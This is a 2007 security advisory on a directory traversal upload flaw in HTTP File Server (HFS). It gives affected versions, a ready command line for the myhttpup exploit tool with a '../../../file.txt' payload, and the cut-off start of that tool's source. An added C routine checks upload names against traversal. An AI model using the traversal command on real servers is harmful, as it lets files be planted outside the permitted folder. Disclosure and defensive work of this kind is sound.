Monday, December 10, 2007

[NT] HTTP File Server Upload Directory Traversal

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

- - - - - - - - -

HTTP File Server Upload Directory Traversal
------------------------------------------------------------------------


SUMMARY

<http://www.rejetto.com/hfs/> HFS is "an HTTP File Server that can be used to
send and receive files". A directory traversal vulnerability in HFS allows
remote attackers to upload files to locations that reside outside the
bounding HTTP root directory.

DETAILS

Vulnerable Systems:
* HTTP File Server (HFS) version 2.2a and prior
* HTTP File Server (HFS) version 2.3beta and prior

Immune Systems:
* HTTP File Server (HFS) version 2.2b #150
* HTTP File Server (HFS) version 2.3 beta #160

HFS allows the uploading of files to the real folders added to the Virtual
File System. The problem is that an attacker can upload files outside the
destination folder, reaching the root or any other directory on the disk
where the upload folder is located, by using the ../ pattern in the file name.

Note that uploading must be enabled on the target folder, that the
attacker must have access to it (it is possible to restrict access to
that folder to a specific account) and that it is not possible to overwrite
existing files because the server prevents it (for example, if a file called
file.txt already exists the new one will be called file(1).txt).
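As an added, defensive illustration (not part of the advisory and not HFS code), the kind of lexical check a file server can apply to the client-supplied upload name before joining it to the upload folder, so that the ../ pattern described above is rejected rather than resolved; the function name, its allow_subdirs flag and the sample names are assumptions:

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
/* Returns 1 if the client-supplied upload name cannot escape the upload
 * folder, 0 if it must be rejected.  The check is lexical and runs on the
 * name alone, before it is joined to the folder path.  '/' and '\\' both
 * count as separators (HFS runs on Windows), "." segments are ignored and
 * ".." is accepted only while it stays below the folder.  With
 * allow_subdirs == 0 any separator at all is rejected. */
int upload_name_is_confined(const char *name, int allow_subdirs)
{
    const char *p = name;
    int depth = 0;                      /* directories below the upload folder */
    size_t n = name ? strlen(name) : 0;

    if (n == 0) return 0;
    /* absolute and UNC paths, drive letters and a trailing separator all
       name a location the client must not choose */
    if (name[0] == '/' || name[0] == '\\') return 0;
    if (isalpha((unsigned char)name[0]) && name[1] == ':') return 0;
    if (name[n - 1] == '/' || name[n - 1] == '\\') return 0;
    if (!allow_subdirs && (strchr(name, '/') || strchr(name, '\\'))) return 0;

    while (*p) {
        const char *seg = p;
        size_t len;
        while (*p && *p != '/' && *p != '\\') p++;
        len = (size_t)(p - seg);
        if (*p) p++;                    /* step over the separator */
        if (len == 0 || (len == 1 && seg[0] == '.')) continue;
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (depth == 0) return 0;   /* would pop above the upload folder */
            depth--;
        } else {
            depth++;
        }
    }
    return depth > 0;                   /* 0: resolved to the folder itself */
}

int main(void)
{   /* constructed sample names, including the advisory's ../ pattern */
    const char *names[] = { "file.txt", "../../../file.txt", "..\\..\\file.txt",
                            "sub/../file.txt", "a/b/../../../x", "C:\\file.txt" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-20s %s\n", names[i],
               upload_name_is_confined(names[i], 1) ? "accepted" : "rejected");
    return 0;
}
```

The check must be applied to the raw name the client sent, before any decoding or concatenation done later in the server, and the non-overwrite renaming the advisory mentions is a separate safeguard, not a substitute for it.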

Exploit:
Download myhttpup from <http://aluigi.org/testz/myhttpup.zip> and run:
myhttpup http://SERVER/folder file.txt ../../../file.txt

(The code of myhttpup.zip has been pasted below)

mydownlib.c:
/*

mydownlib
by Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

Copyright 2006,2007 Luigi Auriemma

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA

http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <sys/stat.h>
#include <time.h>
#include <ctype.h>
#include <zlib.h>
#include "mydownlib.h"

#ifdef WIN32
#include <winsock.h>

#define close closesocket
#define in_addr_t uint32_t
#define TEMPOZ1
#define TEMPOZ2 GetTickCount()
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/times.h>
#include <sys/timeb.h>

#define stristr strcasestr
#define stricmp strcasecmp
#define strnicmp strncasecmp
#define TEMPOZ1 ftime(&timex)
#define TEMPOZ2 ((timex.time * 1000) + timex.millitm)
#define ONESEC 1